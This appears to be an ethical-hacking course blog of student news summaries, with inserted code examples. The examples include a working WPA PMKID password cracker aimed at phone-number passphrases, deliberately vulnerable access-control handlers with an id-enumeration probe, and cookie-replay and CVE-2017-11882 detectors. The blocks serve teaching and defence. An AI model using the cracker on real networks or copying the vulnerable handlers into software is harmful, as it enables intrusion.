Ethical Hacking

Wade Mackey

FBI spams thousands with fake infosec advice after ‘software misconfiguration’

November 15, 2021 By Ryan Trapp Leave a Comment

In what is one of the bigger news items of the week, the FBI has had one of its servers compromised and fake emails sent out from it. Since the emails were sent from one of the FBI’s servers they appeared legitimate, as they actually came from the FBI’s domain. The emails were a false warning that the FBI had detected a chain attack and that the company’s virtual servers had been exfiltrated. They also laid blame for the attack at the feet of Vinny Troia, founder of the infosec firms Shadow Byte Cyber and Night Lion Security. It does not appear that this is the case. In total, about 100,000 of these emails were sent out before the campaign was stopped.

https://www.theregister.com/2021/11/15/fbi_fake_emails/

Attack the block – How a security researcher cracked 70% of urban WiFi networks in one hit

November 11, 2021 By Matthew Bryan 1 Comment

A CyberArk researcher, Ido Hoorvitch, identified that many urban areas have unsafe, weak WiFi passwords that can be easily cracked. Hoorvitch collected 5,000 WiFi hashes around his neighborhood using network-sniffing equipment. These were run through CyberArk’s “monster” password-cracking rig, which used an exploit found in PMKID hashes.

Hoorvitch noted that many people use cell phone numbers as their WiFi password. This allowed him to crack numerous hashes, obtain passwords, and then access their networks. In the cases where a phone number was used, it took approximately nine minutes for each crack. If routers do not support roaming modes, then they are not susceptible to this attack. It is recommended that complex passwords be used with secure encryption protocols. WPA/WPA1 should be disabled.

Author: Matias Madou
Published: October 20, 2021
Link
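The post says phone-number passwords fell to a PMKID attack; the example below shows why, in code. It is an added illustration, not code from the post or from CyberArk’s research: it derives the WPA2-PSK PMK and PMKID the way the standard defines them (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, then HMAC-SHA1-128 of “PMK Name” plus the two MAC addresses), emits the record in the layout hashcat’s mode 22000 expects, and then runs an offline guess over phone-number-shaped candidates. The SSID, MAC addresses and the passphrase are constructed for the example; the search covers only the last three digits so that it finishes in seconds in pure Python, where the real attack searched the whole number on a GPU rig.

```python
import hashlib
import hmac
import itertools

# Constructed sample values for this example (not from the CyberArk research).
SSID = b"HomeNet-5G"
AP_MAC = bytes.fromhex("a4b1c2d3e4f5")    # hypothetical access point BSSID
STA_MAC = bytes.fromhex("0011223344ff")   # hypothetical client MAC
TRUE_PASSPHRASE = "0541234567"            # ten-digit, phone-number-shaped passphrase (constructed)


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK key derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are the entire cost of one guess; the SSID is the salt, so a table built
    for one network name cannot be reused against another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, dklen=32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the HMAC tag.
    An AP with roaming support places this value in the first EAPOL frame, which is why a
    sniffer needs neither a connected client nor the full four-way handshake to obtain it."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: bytes) -> str:
    """Format one capture as a hashcat mode 22000 PMKID record (type 01). The three trailing
    fields (ANONCE, EAPOL, message pair) are only filled in for handshake records."""
    return "WPA*01*{}*{}*{}*{}***".format(pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.hex())


def phone_candidates(prefix: str, free_digits: int):
    """Enumerate phone-number-shaped passphrases: a known prefix (country, area or operator
    code) followed by every combination of the remaining digits. With three digits fixed, a
    ten-digit number leaves only 10**7 guesses, which is minutes on a GPU rig at 4096 PBKDF2
    rounds per guess, against years for a random ten-character passphrase."""
    for tail in itertools.product("0123456789", repeat=free_digits):
        yield prefix + "".join(tail)


def crack_pmkid(pmkid: bytes, ssid: bytes, ap_mac: bytes, sta_mac: bytes, candidates):
    """Offline dictionary attack against one captured PMKID.
    Returns (passphrase, guesses_tried) or (None, guesses_tried)."""
    tried = 0
    for candidate in candidates:
        tried += 1
        if not 8 <= len(candidate) <= 63:      # WPA passphrases are 8..63 characters
            continue
        guess = compute_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return candidate, tried
    return None, tried


def capture_sample_pmkid() -> bytes:
    """Stand-in for the sniffer: the PMKID an AP configured with TRUE_PASSPHRASE would emit."""
    return compute_pmkid(derive_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC)


if __name__ == "__main__":
    captured = capture_sample_pmkid()
    print(hashcat_22000_line(captured, AP_MAC, STA_MAC, SSID))
    # The attacker knows the local prefix and searches the last three digits (1,000 guesses).
    found, tried = crack_pmkid(captured, SSID, AP_MAC, STA_MAC, phone_candidates("0541234", 3))
    print("recovered:", found, "after", tried, "guesses")
```

The defensive reading is the same as the post’s: the cost of PBKDF2 is fixed by the standard, so the only lever the network owner has is the size of the keyspace, and a phone number with a guessable prefix has almost none.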

The Top 3 Cyber Security Mistakes and How to Avoid Them

November 9, 2021 By Oluwaseun Soyomokun Leave a Comment

Ransomware cost Americans an estimated $1.4 billion last year, and beyond high-profile hacks like the Kaseya and Colonial Pipeline breaches, cyber threats are more common than ever. As a result, businesses of all sizes are scrambling to learn more about cyber security and ensure that they have the proper measures in place to protect their operations. These are the top three considerations organizations must take into account when implementing or upgrading their cyber security approach.

  1. People and Training

First and foremost, there is a significant lack of cybersecurity education among employees. The human firewall is the most important defense, but it is also the most vulnerable. That means security training has to be a top priority when it comes to an organization’s cyber security. Organizations should implement a security awareness training platform which trains, tests and scores all employees. It’s important to teach employees how to identify cyber security threats and remain vigilant toward anything suspicious, such as scams, fraudulent emails, or even physical threats. It’s also important to consider implementing some sort of email gateway filter. With the rise of remote working, additional problems emerge as more people go mobile. For example, it is much easier on mobile to mix company and private mail and people tend to click quickly, which leads to errors. We all need to slow down, verify incoming requests and be cognizant of what we are clicking on so that we do not fall victim to a cyber security threat.

  2. Technology and System

It is also paramount that organizations ensure systems are fully patched, inclusive of their OS, firmware and applications. They must ensure each endpoint detection and response application is installed on each device, with all systems reporting back to a central location or Security Operation Center, where all notifications, events, and alarms can be correlated. A quality Detection and Response application is not only going to defend against malware and other malicious activity, but it will also identify possible insider threats by monitoring lateral traffic. Utilizing such Security SaaS should be part of the overarching security platform which will provide a level of behavioral analytics with the ability to determine what is standard for that user and/or system. Therefore, this allows organizations to identify unusual activity, even if the user has the rights to the systems being accessed.

Additionally, I would suggest VLANs and least privilege access or even zero trust as a greater security play. For example, IoT devices should not cohabitate on the same VLAN as the accounting or human resources department. This type of network segmentation allows for greater risk reduction.

  3. Staffing and Security Operations

Many organizations forgo the managed services model to create an in-house security operations center, believing they can do it themselves. There are many cyber security tools available; however, there are very few trained and certified security engineers, and these tools often rely upon alarms, event notifications, or automated messaging to provide alerts. However, this begs the question, who will be monitoring and mitigating the environment at 3 a.m. on New Year’s Eve? Effective cyber security infrastructure requires extensive resources to reduce the total volume of alerts, alarms and events to an actionable notification which requires mitigation. Vacation, training, sick time, education and retention programs are all factors to consider when creating a security operations center. There is a deficit of security analysts, engineers and architects throughout the cyber security space today. Even if you can hire a strong team of cyber security specialists, security operations centers require at least five to six people to ensure 24/7 coverage.

In addition to the personnel issues, there are also equipment, software updates and proper configuration to consider. True quality deployment will require multiple layers, and the systems will have to be integrated, monitored and managed. In comparison, an organization that outsources its cyber security needs can depend upon systems being maintained and a team of experts to support them. Simply put, organizations should secure their environment through a third-party managed security service. These services are inclusive of EDRs, patching systems, a security information event manager, behavioral analytics and east/west traffic monitoring. At best, with the current staffing shortage, an in-house SOC is an ineffective method to detect, quarantine and/or remediate an infected device and/or network.

Hackers are only becoming more sophisticated and, big or small, no organization can afford to go unprotected. Being aware of these three points is critical in protecting your organization from cyber threats. In the current cyber security environment, there is no room for mistakes.

The Top 3 Cyber Security Mistakes and How to Avoid Them – Cyber Defense Magazine

These are the top cybersecurity challenges of 2021

October 26, 2021 by Oluwaseun Soyomokun Leave a Comment

TOP CYBERSECURITY CHALLENGES OF 2021

  • Corporate leaders are increasingly elevating the importance of cybersecurity to their companies.
  • But recent high-profile attacks show how much more needs to be done in the year ahead.
  • Here are the five biggest cybersecurity challenges that must be overcome.

The far-reaching cybersecurity breaches of 2020, culminating in the widespread SolarWinds supply chain attack, were a reminder to decision-makers around the world of the heightened importance of cybersecurity. Cybersecurity is a board-level issue now for many firms.

As per the World Economic Forum’s Global Risks Report 2021, cyber risks continue ranking among global risks. The COVID-19 pandemic has accelerated technological adoption, yet exposed cyber vulnerabilities and unpreparedness, while at the same time exacerbated the tech inequalities within and between societies.

Looking at the year ahead, it is critical to continue elevating cybersecurity as a strategic business issue and develop more partnerships between industries, business leaders, regulators and policymakers. Just like any other strategic societal challenge, cybersecurity cannot be addressed in silos.

Here is a list of five main cybersecurity challenges that global leaders should consider and tackle in 2021.

1. More complex cybersecurity challenges

Digitalization increasingly impacts all aspects of our lives and industries. We are seeing the rapid adoption of machine learning and artificial intelligence tools, as well as an increasing dependency on software, hardware and cloud infrastructure.

The complexity of digitalization means that governments are fighting different battles — from “fake news” intended to influence elections to cyber-attacks on critical infrastructure. These include the recent wave of ransomware attacks on healthcare systems to the pervasive impact of a compromised provider of widely-adopted network management systems. Vital processes, such as the delivery of the vaccines in the months to come, may also be at risk.

Facing these heightened risks, decision-makers and leaders need to acknowledge that cybersecurity is a national security priority.

The blurring line between digital and physical domains indicates that nations and organizations will only be secure if they incorporate cybersecurity features, principles and frameworks, which are a necessity for all organizations, especially those with high-value assets. In today’s battles, governments have to adapt to fight against attackers that are silent, distributed, varied and technically savvy. The public and private sectors alike are engaged in this battle – and the private sector will need what only the public sphere can bring to the fight, including policy-making, market-shaping incentive models and training on a large scale.

Image: How business leaders rate risks (World Economic Forum’s COVID-19 Risks Outlook)

2. Fragmented and complex regulations

Cyber adversaries do not stop at countries’ borders, nor do they comply with different jurisdictions. Organizations, meanwhile, must navigate both a growing number and increasingly complex system of regulations and rules, such as the General Data Protection Regulation, the California Consumer Privacy Act, the Cybersecurity Law of the People’s Republic of China and many others worldwide.

Privacy and data protection regulations are necessary, but can also create fragmented, and sometimes conflicting, priorities and costs for companies that can weaken defence mechanisms. Within organisations’ budgetary boundaries, companies have to defend and protect against attacks while they also seek to comply with complex regulations.

Policymakers, thus, need to weigh their decisions with this impact in mind. Individual regulations may have similar intent, but multiple policies add complexity for businesses that need to comply with all regulations, and this complexity introduces its challenges to cybersecurity and data protection, not always improving them. Policies must be creative in increasing protection while decreasing regulatory complexity. Cooperation among different policymakers is critical.

3. Dependence on other parties

Organizations operate in an ecosystem that is likely more extensive and less certain than many may recognize. Connected devices are expected to reach 27 billion by 2021 globally, driven by trends such as the rise of 5G, the internet of things and smart systems. In addition, the boom in remote work that began with the pandemic is expected to continue for many. The concentration of a few technology providers globally provides many entry points for cyber criminals throughout the digital supply chain.

The ecosystem is only as strong as its weakest link. The recent attacks against FireEye and SolarWinds highlight the sensitivity of supply chain issues and dependence on providers of IT functionality and services. Organizations must consider what the breadth of this exposure really means and must take steps to assess the real extent of their entire attack surface and resilience to threats. An inclusive and cross-collaborative process involving teams across different business units is vital to make sure there is an acceptable level of visibility and understanding of digital assets.

4. Lack of cybersecurity expertise

Ransomware is the fastest-growing cybercrime and the COVID-19 pandemic has exacerbated this threat. Preventative measures for ransomware or any other cyber-attack should include preparation: presume you will get hit, back up IT resources and data, make sure there is continuity of operations in disruptions to computer systems, and drill and train the organization in realistic cyber response plans.

Businesses that actively adopt cybersecurity and more importantly improve their cybersecurity infrastructure are more likely to be successful. These businesses have come to see cybersecurity as an enabler to everyday operations. The significance of cybersecurity will likely only increase in the future in order to take advantage of the speed, scale, flexibility, and resilience that digitalization promises. Security by design and by default are becoming integral to success.

Organizational priorities should include a proactive plan for each business to build and maintain its own cybersecurity workforce. With security expertise becoming so difficult to source and retain, organizations should consider cultivating this talent organically. Organizations must also recognize that mobility is implicit in the modern technology workforce. It will be important to plan for the expected tenure of experienced professionals and recognize the long-term benefits that will accrue from a reputation for cultivating this expertise, transmitted from veterans to newcomers entering the field.

5. Difficulty tracking cyber criminals

Being a cyber criminal offers big rewards and few risks since, until recently, the likelihood of detection and prosecution of a cybercriminal was estimated to be as low as 0.05% in the US. This percentage is even lower in many other countries. Even when not obscuring criminal activity through techniques such as dark web tactics, it can be very challenging to prove that a specific actor committed certain acts. Cyber crime is a growing business model, as the increasing sophistication of tools on the darknet makes malicious services more affordable and easily accessible for anyone that is willing to hire a cyber criminal.

Policymakers can help by working with cyber crime experts to establish internationally accepted criteria for attribution, evidence, and cooperation in pursuing cyber criminals and bringing them to justice.

We have learned a lot over the last 18 months, and 2021 will be no different. We need to continue to adapt and take cyber risks seriously by planning, preparing and educating. Since it is a universal issue, open communications between corporations, policymakers, and regulators are a critical key to success. Until security features become integral to technology – seamless, transparent, and naturally usable by people – we will need to rely on business leadership to pay serious attention to cybersecurity.

Link: https://www.weforum.org/agenda/2021/01/top-cybersecurity-challenges-of-2021/

Tagged With: Uncategorized

Facebook sues scraper who sold 178 million phone numbers and user IDs

October 25, 2021 by Ryan Trapp 2 Comments

I found this article interesting purely based on the hypocrisy of Facebook being upset at user data being sold. It is alleged that this individual used virtual Android devices to perform phone number enumeration scraping. He then assembled a database of user IDs and phone numbers which he put up for sale on a known marketplace for questionably obtained data. Facebook is now suing this person for violation of their terms of service. I guess Facebook is the only one that is allowed to sell their users’ information.

https://www.theregister.com/2021/10/25/facebook_sues_man_for_scraping/

Tagged With: Uncategorized, Week 9

OWASP’s 2021 List Shuffle: A New Battle Plan and Primary Foe

October 24, 2021 by Matthew Bryan 2 Comments

I thought this was timely given this week’s topic. OWASP recently refreshed their list of web application vulnerabilities which saw Code Injection Vulnerabilities being replaced by Broken Access Control as #1.

The article notes that this shifting in order was not due to “solving” Code Injection Vulnerabilities, but rather it illustrates how widespread Broken Access Control is in the field. Broken Access Control “encompasses a wide range of coding flaws” that could “enable attackers to modify a URL, internal application state, or part of an HTML page.” The category includes any instance where access control policies can be violated so that users can act outside of their intended permissions.

The updated OWASP list also debuted new categories on the list, including Insecure Design, Software & Data Integrity Failure, and Server-Side Request Forgery.

Author: Matias Madou

Published: October 20, 2021

Link

Filed Under: Week 6, Week 8 Tagged With:
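The two Broken Access Control flavours the quoted definition names, modifying a URL and modifying internal application state, are easiest to see side by side. The example below is an added illustration, not code from the post or from OWASP: an invoice lookup where the id in the URL is trusted (an IDOR) next to the same lookup with an object-level authorization check, and a profile update that writes every request field to the user record (mass assignment, which lets a caller set its own role) next to an allow-listed version. The records, users and handler names are constructed for the example; `probe_ids` is the enumeration an authorization test, or an attacker, would run as a low-privilege user.

```python
from dataclasses import dataclass, replace


# Constructed records standing in for database rows (not from the OWASP article).
@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner_id: int
    amount_cents: int


@dataclass(frozen=True)
class User:
    user_id: int
    email: str
    role: str = "customer"


INVOICES = {
    1001: Invoice(1001, owner_id=7, amount_cents=12_000),
    1002: Invoice(1002, owner_id=9, amount_cents=250_000),
}
USERS = {
    7: User(7, "alice@example.com"),
    9: User(9, "bob@example.com"),
    42: User(42, "ops@example.com", role="admin"),
}


class NotFound(Exception):
    pass


# 1. Object level: the id taken from the URL is trusted (GET /invoices/<id>).

def get_invoice_vulnerable(current_user_id: int, invoice_id: int) -> Invoice:
    """Authentication happened (current_user_id is a logged-in user) but ownership is never
    checked, so Alice reads Bob's invoice by editing the id in the URL: the IDOR pattern."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise NotFound(invoice_id)
    return invoice


def can_read_invoice(user: User, invoice: Invoice) -> bool:
    """One central, deny-by-default policy: the owner or an admin."""
    return user.role == "admin" or invoice.owner_id == user.user_id


def get_invoice_secure(current_user_id: int, invoice_id: int) -> Invoice:
    """Same lookup, then an authorization decision on the fetched object. A record that is not
    the caller's gets the same NotFound as a record that does not exist, so the endpoint does
    not confirm which ids are valid."""
    invoice = INVOICES.get(invoice_id)
    user = USERS[current_user_id]
    if invoice is None or not can_read_invoice(user, invoice):
        raise NotFound(invoice_id)
    return invoice


# 2. Application state: a client-supplied field overwrites a privileged attribute.

def update_profile_vulnerable(current_user_id: int, payload: dict) -> User:
    """Mass assignment: every key in the request body is written to the user record, so a body
    of {"email": ..., "role": "admin"} promotes the caller."""
    USERS[current_user_id] = replace(USERS[current_user_id], **payload)
    return USERS[current_user_id]


WRITABLE_BY_USER = {"email"}


def update_profile_secure(current_user_id: int, payload: dict) -> User:
    """Allow-list the fields a user may change. Unknown fields are rejected rather than silently
    dropped, so tampering shows up as an error in the logs instead of quietly doing nothing."""
    unknown = set(payload) - WRITABLE_BY_USER
    if unknown:
        raise PermissionError("fields not writable by user: " + ", ".join(sorted(unknown)))
    USERS[current_user_id] = replace(USERS[current_user_id], **payload)
    return USERS[current_user_id]


def probe_ids(handler, current_user_id: int, ids) -> set:
    """Walk an id range as one user and record which objects the handler returns."""
    readable = set()
    for invoice_id in ids:
        try:
            handler(current_user_id, invoice_id)
            readable.add(invoice_id)
        except NotFound:
            pass
    return readable


def outcome(handler, *args) -> str:
    """Run a handler and report "ok" or the name of the exception it raised."""
    try:
        handler(*args)
        return "ok"
    except Exception as exc:
        return type(exc).__name__
```

The point of the policy function is that the decision is made on the object after it is loaded, in one place, rather than relying on the client never guessing an id; the point of the allow-list is that the set of writable fields is a server-side decision, not whatever the request happens to contain.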

Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts

October 21, 2021 by Shubham Patil 2 Comments

Google said it found no fewer than 15,000 accounts behind the phishing messages and 1,011 domains that were purpose-built to deliver the fraudulent software responsible for executing cookie stealing malware designed to extract passwords and authentication cookies from the victim’s machine and upload them to the actor’s command-and-control servers. The hackers would then use the session cookies to take control of a YouTube creator’s account, effectively circumventing two-factor authentication (2FA), as well as take steps to change passwords and the account’s recovery email and phone numbers.

Link: https://thehackernews.com/2021/10/hackers-stealing-browser-cookies-to.html

Filed Under: Week 8 Tagged With:
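The campaign above works because a session cookie is proof of an earlier login, 2FA included, and nothing ties it to the browser it was issued to. As an added example that is not code from the post or from Google’s report, the block below contrasts a cookie-only authorization check with one that binds the session to a coarse client fingerprint (hashed User-Agent plus /24 network) recorded at login and revokes the session on a mismatch, and adds a log-side detector that flags a session id seen from two different clients within a short window. The sessions, requests and log lines are constructed; the fingerprint fields and thresholds are this example’s choices, not a platform’s actual signals.

```python
import hashlib
import ipaddress
import secrets
import time
from dataclasses import dataclass


# All sessions, requests and log lines below are constructed for this example.
@dataclass
class Session:
    user: str
    mfa_passed: bool
    ua_hash: str
    net: str            # client network at login, e.g. "203.0.113.0/24"
    issued_at: float
    revoked: bool = False


SESSIONS: dict = {}


def client_network(ip: str) -> str:
    """Coarsen the address (IPv4 /24, IPv6 /48) so ordinary DHCP churn does not trip the check."""
    addr = ipaddress.ip_address(ip)
    bits = 24 if addr.version == 4 else 48
    return str(ipaddress.ip_network(f"{ip}/{bits}", strict=False))


def ua_hash(user_agent: str) -> str:
    return hashlib.sha256(user_agent.encode("utf-8")).hexdigest()[:16]


def login(user: str, user_agent: str, ip: str, mfa_passed: bool = True) -> str:
    """Issue a session cookie after password and 2FA, remembering the client it was issued to."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = Session(user, mfa_passed, ua_hash(user_agent), client_network(ip), time.time())
    return token


def authorize_naive(token: str):
    """Cookie-only check: whoever presents the cookie is the user, and 2FA was satisfied long ago.
    This is exactly what a stolen cookie buys the attacker in the campaign."""
    s = SESSIONS.get(token)
    return s.user if s and s.mfa_passed and not s.revoked else None


def authorize_bound(token: str, user_agent: str, ip: str):
    """Compare the presenting client with the one the cookie was issued to. A mismatch revokes
    the session and forces a fresh login with 2FA instead of quietly serving the request."""
    s = SESSIONS.get(token)
    if s is None or s.revoked:
        return None, "no-session"
    if s.ua_hash != ua_hash(user_agent) or s.net != client_network(ip):
        s.revoked = True
        return None, "fingerprint-mismatch"
    return s.user, "ok"


def find_replayed_sessions(log_lines, window_seconds: int = 600) -> set:
    """Detection over access logs: one session id used from different browser/network pairs
    within window_seconds. Line format (constructed): <unix_ts> <session_id> <ip> "<user_agent>"."""
    first_seen: dict = {}
    flagged = set()
    for line in log_lines:
        ts_str, sid, ip, ua = line.split(" ", 3)
        ts = float(ts_str)
        fp = (ua_hash(ua.strip('"')), client_network(ip))
        seen_ts, seen_fp = first_seen.setdefault(sid, (ts, fp))
        if fp != seen_fp and ts - seen_ts <= window_seconds:
            flagged.add(sid)
    return flagged


SAMPLE_LOG = [
    '1634800000 sess-a1 203.0.113.10 "Mozilla/5.0 (Windows NT 10.0) Chrome/94.0"',
    '1634800040 sess-a1 203.0.113.11 "Mozilla/5.0 (Windows NT 10.0) Chrome/94.0"',  # same /24, same UA
    '1634800120 sess-a1 198.51.100.5 "curl/7.79.1"',                                 # cookie replayed elsewhere
    '1634800200 sess-b2 192.0.2.7 "Mozilla/5.0 (Macintosh) Safari/605.1"',
]
```

Fingerprint binding is a coarse control (mobile users change networks, and an attacker who also copies the User-Agent from the same infected machine defeats the UA half), so the more durable mitigations are short-lived sessions and a step-up re-authentication, with 2FA, before sensitive changes such as the recovery email or phone number that the campaign went after.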

How Coinbase Phishers Steal One-Time Passwords

October 21, 2021 by Shubham Patil Leave a Comment

A recent phishing campaign targeting Coinbase users shows thieves are getting smarter about phishing one-time passwords (OTPs) needed to complete the login process. It also shows that phishers are attempting to sign up for new Coinbase accounts by the millions as part of an effort to identify email addresses that are already associated with active accounts.

Link: https://krebsonsecurity.com/2021/10/how-coinbase-phishers-steal-one-time-passwords/#more-57245  

Filed Under: Week 7 Tagged With:

Geriatric Microsoft Bug Exploited by APT Using Commodity RATs

October 20, 2021 by Oluwaseun Soyomokun 1 Comment

An Advanced Persistent Threat (APT) described as a “lone wolf” is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity Remote Access Trojans (RATs) to organizations in India and Afghanistan, researchers have found.

Attackers use political and government-themed malicious domains as lures in the campaign, which targets mobile devices with out-of-the-box RATs such as dcRAT and QuasarRAT for Windows and AndroidRAT. They’re delivering the RATs in malicious documents by exploiting CVE-2017-11882.

CVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company patched it in 2017. However, as recently as two years ago, attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.

The advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.

To host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.

“This campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims” – in this case, RATs “packed with multiple functionalities to achieve complete control over the victim’s endpoint,”

https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/

Tagged With: Uncategorized
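The lure documents in this campaign carry an embedded Equation Editor object, which is what CVE-2017-11882 lives in. As an added example that is not code from the post or from the Threatpost/Talos reporting, the block below is a triage scanner for that indicator across the three container formats such documents arrive in: the Equation.3 COM class identifier {0002CE02-0000-0000-C000-000000000046} in its little-endian on-disk form for OLE files, the same CLSID and the class name hex-encoded inside an RTF `\objdata` block (after stripping the whitespace attackers scatter through the hex), and the `ProgID="Equation.3"` reference or an embedded OLE part inside a .docx zip. The sample files are constructed for the example and contain no exploit payload.

```python
import io
import re
import zipfile

# Equation Editor (Equation.3) COM class {0002CE02-0000-0000-C000-000000000046}.
# OLE structured storage stores the first three GUID fields little-endian, giving these bytes.
EQNEDT_CLSID_LE = bytes.fromhex("02CE020000000000C000000000000046")
EQNEDT_CLSID_HEX_RE = re.compile(rb"02ce020000000000c000000000000046", re.IGNORECASE)
EQUATION3_NAME_HEX_RE = re.compile(rb"4571756174696f6e2e33", re.IGNORECASE)   # "Equation.3"
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
RTF_MAGIC = b"{\\rtf"
ZIP_MAGIC = b"PK\x03\x04"


def scan_document(data: bytes) -> list:
    """Return the Equation Editor indicators found in a .doc/.rtf/.docx/OLE blob, in the order
    they are checked. An empty list means no Equation.3 object was found, not that the file is safe."""
    hits = []
    if data.startswith(OLE_MAGIC):
        if EQNEDT_CLSID_LE in data:
            hits.append("ole:equation3-clsid")
    elif data.startswith(RTF_MAGIC):
        flat = re.sub(rb"\s+", b"", data)          # \objdata hex is routinely split across lines
        if re.search(rb"\\objclass\s*Equation\.3", data):
            hits.append("rtf:objclass-equation3")
        if EQUATION3_NAME_HEX_RE.search(flat):
            hits.append("rtf:objdata-equation3-name")
        if EQNEDT_CLSID_HEX_RE.search(flat):
            hits.append("rtf:objdata-equation3-clsid")
    elif data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                part = zf.read(name)
                if name.startswith("word/embeddings/") and EQNEDT_CLSID_LE in part:
                    hits.append(f"docx:{name}:equation3-clsid")
                elif name.endswith(".xml") and b'ProgID="Equation.3"' in part:
                    hits.append(f"docx:{name}:progid-equation3")
    return hits


def build_samples() -> dict:
    """Constructed test files: a minimal OLE header followed by the CLSID, an RTF with an
    embedded Equation.3 object, a .docx that references the ProgID, and a benign .docx."""
    ole = OLE_MAGIC + b"\x00" * 64 + EQNEDT_CLSID_LE + b"\x00" * 16
    rtf = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata\n"
           b"01050000020000000b0000004571756174696f6e2e33000000000000\n"
           b"02ce02000000 0000c00000000000 0046\n}}}")

    def docx(document_xml: bytes) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("[Content_Types].xml", "<Types/>")
            zf.writestr("word/document.xml", document_xml)
        return buf.getvalue()

    return {
        "ole": ole,
        "rtf": rtf,
        "docx_eqn": docx(b'<w:document><o:OLEObject ProgID="Equation.3" r:id="rId4"/></w:document>'),
        "docx_benign": docx(b"<w:document><w:body><w:p/></w:body></w:document>"),
    }


if __name__ == "__main__":
    for label, blob in build_samples().items():
        print(label, scan_document(blob))
```

Two caveats apply. A document with a genuine equation matches too, so a hit is a reason to detonate or inspect the object, not a verdict; and a byte-level scan is only as good as the de-obfuscation in front of it, since RTF exploit builders hide the OLE blob behind control-word noise that a real parser (or a tool such as oletools’ rtfobj) unpacks and this example does not. On the host side the fix is the November 2017 patch, or the later Office updates that removed the Equation Editor binary altogether.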

Human Psyche is the Victim

October 19, 2021 by Vanessa Marin 1 Comment

Title: How Attackers Hack Humans
Author: Williesha Morris
Publish Date: October 15, 2021
Website: DarkReading.com

We talked about social engineering and how employees are targeted to gather information. Recon 101! Email, phone, text. It’s an interesting perspective article on hacking humans told from the POV of former CIA operative Peter Wamka. He speaks about how tools 20 years in the making are being used now to rely on soft targets to get to hard targets.

Some key points we talked about in class were distinctly pointed out in the article:

  • insider targets: overworked, underpaid, and underappreciated employees
  • job postings: can detail all of the systems and databases that a company uses that can be targeted for infiltration
  • media releases: show how an organization is growing and changing and name potential targets and their job titles or even hobbies and interests.
  • internet searches: “employee manual” and “PDF”  can reveal benefit packages, rules, and other confidential information
  • social media: work history, certifications, volunteer work, political leanings, relationship statuses, and favorite books and movies.
  • pictures: demonstrate socioeconomic status

An interesting take on the article is that it provides an interesting alternative option for protecting their employees. Not just the mandatory IT security employee training, but taking “protecting your people” to another level.

  • Offering training or classes with guidance on how to secure their social media profiles.
    • “Helping employees use privacy controls and restricted settings is good for their personal safety and can help the organization, as well.”
  • Show how social media posts can be used against a person.
  • Training to include what work details shouldn’t be posted socially.

Essentially, the company is protecting itself by virtue of protecting you.

Very good read!

Also, if interested:  Peter Wamka has a book out that could prove to be very fun: Confessions of a CIA Spy: The Art of Human Hacking

Vanessa

Filed Under: Week 8 Tagged With:

Missouri Governor Retaliation! OMG!

October 19, 2021 by Vanessa Marin 1 Comment

Title: Missouri Governor Vows to Prosecute St. Louis Post-Dispatch for Reporting Security Vulnerability
Author: Brian Krebs
Published Date: October 14, 2021

So I HAD to find this article. I couldn’t believe my ears when Prof Mackey brought it up. It is the most interesting read. Instead of owning the vulnerability Missouri GOV chooses to blame the reporter for “exploiting” it for publicity. When in reality the reporter found the vulnerability, reported it to the appropriate entity and then held off on publishing the story until the government had the opportunity to remediate the issue. Rather than being thankful, the Governor takes a vindictive stance against the reporter. Key points in this article are the intimidation tactics that the Governor is using. These threats really do hinder future whistleblowers. They prevent good Samaritans from coming forward for fear of being prosecuted.

Filed Under: Week 7 Tagged With:

Attackers Behind Trickbot Expanding Malware Distribution Channels

October 19, 2021 by Ryan Trapp 1 Comment

The bad actors behind the infamous Trickbot malware have resurfaced in an attempt to expand their distribution channels. Their new goal appears to be the deployment of ransomware. The Trickbot malware itself has evolved from a banking Trojan to a modular Windows-based crimeware solution. They are moving away from sending out phishing emails with Excel documents to more diversified delivery methods.

https://thehackernews.com/2021/10/attackers-behind-trickbot-expanding.html

Filed Under: Week 8 Tagged With:

Rickroll Grad Prank Exposes Exterity IPTV Bug

October 17, 2021 by Matthew Bryan Leave a Comment

I thought this was a pretty funny, although risky, prank that took advantage of a zero-day vulnerability in Exterity’s IPTV system. Minh Duong, a former student at Township High School District 214, identified this vulnerability and was able to take control of every TV within the district. This allowed him to pull off the “Big Rick,” which played Rick Astley’s classic “Never Gonna Give You Up” on every IPTV across the district.

The Exterity IPTV system runs networked projectors and TVs across the Township school district. The TV players can receive serial commands via a web interface and an SSH server, which allows for centralized control. Duong noticed this setup earlier in high school and was able to exploit the vulnerability, but didn’t do much with it initially. He later got the idea for the “Big Rick” as a senior prank.

